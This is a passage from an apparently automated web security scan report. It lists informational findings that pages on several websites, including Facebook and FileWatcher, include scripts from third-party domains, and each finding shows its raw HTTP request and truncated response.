Host: www.equipmenttraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:59:20 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 114576


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Construction Equipment, Farm Equipment & Heavy Equipment on Equipment Trader</title>
<
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.771. http://www.equipmenttraderonline.com/research/resources/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.equipmenttraderonline.com
Path:	/research/resources/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET /research/resources/ HTTP/1.1
Host: www.equipmenttraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:48:20 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27279


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Equipment Resources: Equipment loans, attachments, trailers, painting, transport, and
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.772. http://www.equipmenttraderonline.com/sell/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.equipmenttraderonline.com
Path:	/sell/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET /sell/ HTTP/1.1
Host: www.equipmenttraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:59:22 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 25721


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sell your new or used equipment - EquipmentTraderOnline.com</title>
<meta name="descri
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.773. http://www.espatial.com/contact/live-trial-adwords previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.espatial.com
Path:	/contact/live-trial-adwords

Issue detail

The response dynamically includes the following scripts from other domains:

http://t2.trackalyzer.com/trackalyze.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET /contact/live-trial-adwords HTTP/1.1
Host: www.espatial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:24 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.espatial.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31392

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Discover the power of GIS with web delivery | eSpatial GIS USA</title>
<meta name="google-site-verification"
...[SNIP]...
<br />
<script src="http://www.googleadservices.com/pagead/conversion.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

21.774. http://www.everaldo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.everaldo.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.everaldo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:59:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 PHP/4.4.9 mod_fastcgi/2.4.6
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 4718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.everaldo.com/blog/?feed=rss2" />
       <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

21.775. http://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

Response

21.776. http://www.facebook.com/%s previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/%s

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=NgpY2; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:49 GMT
Content-Length: 11704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yP/r/8xr7FhyZNob.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

21.777. http://www.facebook.com/2008/fbml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/2008/fbml

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=wYDCq; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Mon, 24 Jan 2011 16:05:02 GMT
Content-Length: 11725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yP/r/8xr7FhyZNob.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

21.778. http://www.facebook.com/7NEWS previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/7NEWS

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

Response

21.779. http://www.facebook.com/LIMEprpromo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/LIMEprpromo

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

Response

21.780. http://www.facebook.com/abid.bahloul previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/abid.bahloul

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

Response

21.781. http://www.facebook.com/apps/application.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/apps/application.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

Response

21.782. http://www.facebook.com/beirutcityguide previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/beirutcityguide

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

Response

21.783. http://www.facebook.com/connect/connect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/connect/connect.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

Response

21.784. http://www.facebook.com/miofeghali previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/miofeghali

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /miofeghali HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

21.785. http://www.facebook.com/paty.kfoury previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/paty.kfoury

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

Response

21.786. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

Response

21.787. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

Response

21.788. http://www.facebook.com/profile.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/profile.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

Response

21.789. http://www.facebook.com/sharer.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sharer.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

Response

21.790. http://www.facebook.com/xd_receiver_v0.4.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/xd_receiver_v0.4.php

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yF/r/ll3hgnE_kDA.js

Request

GET /xd_receiver_v0.4.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000
Content-Length: 445
Content-Type: text/html; charset=utf-8
Expires: Tue, 24 Jan 2012 16:00:31 -0800
Pragma:
Connection: close
Date: Tue, 25 Jan 2011 00:00:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Cross-Domain Receiver Pa
...[SNIP]...
</script>
<script src="http://c.static.ak.fbcdn.net/rsrc.php/yF/r/ll3hgnE_kDA.js"
type="text/javascript">
</script>
...[SNIP]...

21.791. http://www.fiction.net/blong/programs/#aub/x26amp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fiction.net
Path:	/blong/programs/#aub/x26amp

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /blong/programs/#aub/x26amp HTTP/1.1
Host: www.fiction.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.792. http://www.filewatcher.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET / HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:27:51 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:27:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
Age: 3081
Content-Length: 5356
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>FileWatcher File Search</title>

...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

21.793. http://www.filewatcher.com/_/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/_/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /_/ HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 16:03:06 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "jdJ21hfmT/9pG3o+WHhlrA"
Content-Length: 4389
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 810
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>Results</title>
</head>
<body cl
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

21.794. http://www.filewatcher.com/b/ftp/15.192.45.22.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/15.192.45.22.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/15.192.45.22.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:03 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "SQiChgZEV13FKmoJDq2wlA"
Content-Length: 7818
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 699
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>15.192.45.22/ - FTP Browser</tit
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.795. http://www.filewatcher.com/b/ftp/15.192.45.22/ftp1.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/15.192.45.22/ftp1.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/15.192.45.22/ftp1.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:04 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "BhY/ik4C6r1K3CcImXBENw"
Content-Length: 5627
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 723
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>15.192.45.22/ftp1/ - FTP Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.796. http://www.filewatcher.com/b/ftp/15.192.45.22/ftp1/pub.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/15.192.45.22/ftp1/pub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/15.192.45.22/ftp1/pub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:04 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "nhxZk4J68kggWkoG7viSiA"
Content-Length: 19811
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 730
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>15.192.45.22/ftp1/pub/ - FTP Bro
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.797. http://www.filewatcher.com/b/ftp/15.192.45.22/ftp1/pub/alphaserver.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/15.192.45.22/ftp1/pub/alphaserver.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/15.192.45.22/ftp1/pub/alphaserver.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:05 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "kMFMZ9KkXiatn10YtUlJkQ"
Content-Length: 6861
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 736
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>15.192.45.22/ftp1/pub/alphaserve
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.798. http://www.filewatcher.com/b/ftp/15.192.45.22/ftp1/pub/alphaserver/archive.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/15.192.45.22/ftp1/pub/alphaserver/archive.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/15.192.45.22/ftp1/pub/alphaserver/archive.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:05 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "3fD4hVyrzgKw3kQzPsbSdA"
Content-Length: 22498
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 738
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>15.192.45.22/ftp1/pub/alphaserve
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.799. http://www.filewatcher.com/b/ftp/15.192.45.22/ftp1/pub/alphaserver/archive/graphics.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/15.192.45.22/ftp1/pub/alphaserver/archive/graphics.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/15.192.45.22/ftp1/pub/alphaserver/archive/graphics.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:06 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "vVp/1zmCAc1/DYG91uMeOQ"
Content-Length: 19211
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 738
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>15.192.45.22/ftp1/pub/alphaserve
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.800. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.cse.buffalo.edu.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:54 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Payo2AbeQ221Ft6IxSGWBw"
Content-Length: 7468
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:54 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 670
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

